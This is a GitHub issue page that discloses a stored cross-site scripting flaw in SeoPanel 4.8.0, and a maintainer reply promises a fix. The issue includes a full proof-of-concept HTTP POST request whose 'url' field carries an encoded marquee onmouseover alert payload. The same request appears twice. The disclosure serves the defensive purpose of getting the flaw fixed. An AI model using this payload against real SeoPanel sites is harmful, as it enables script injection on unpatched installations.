Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
SeoPanel is vulnerable to stored XSS due to lack of filtration of user-supplied [Autenticated User] Environment
SeoPanel version: 4.8.0 Last Version
Parameter: name="url" [ works on all pages where the parameter is present ]
PoC POST /seo/seopanel/websites.php HTTP/1.1 Host: xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: / Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 203 Origin: xxx DNT: 1 Connection: close Referer: xxx Cookie: PHPSESSID=xxx; hidenews=1
sec=update&oldName=test1&id=5&user_id=1&name=test1&url=https%3A%2F%2F%3Cmarquee+onmouseover%3D%22alert('Xss+12-30-2020')%22%3EoOo_(O.o)_oOo&title=test1&description=test1&keywords=test1&analytics_view_id=
request CVE
The text was updated successfully, but these errors were encountered:
Hi Team,
Sorry for the late reply due to the new year vacation.
Thanks for reporting it to us and for the guidelines.
We will release a new version at the end of this month and will include fixes in it.
I will update you once it is released.
Thanks for the support .
Sorry, something went wrong.
769e402
sendtogeo
No branches or pull requests
SeoPanel is vulnerable to stored XSS due to lack of filtration of user-supplied [Autenticated User]
Environment
Parameter:
name="url" [ works on all pages where the parameter is present ]
PoC
POST /seo/seopanel/websites.php HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: /
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 203
Origin: xxx
DNT: 1
Connection: close
Referer: xxx
Cookie: PHPSESSID=xxx; hidenews=1
sec=update&oldName=test1&id=5&user_id=1&name=test1&url=https%3A%2F%2F%3Cmarquee+onmouseover%3D%22alert('Xss+12-30-2020')%22%3EoOo_(O.o)_oOo&title=test1&description=test1&keywords=test1&analytics_view_id=
request CVE
The text was updated successfully, but these errors were encountered: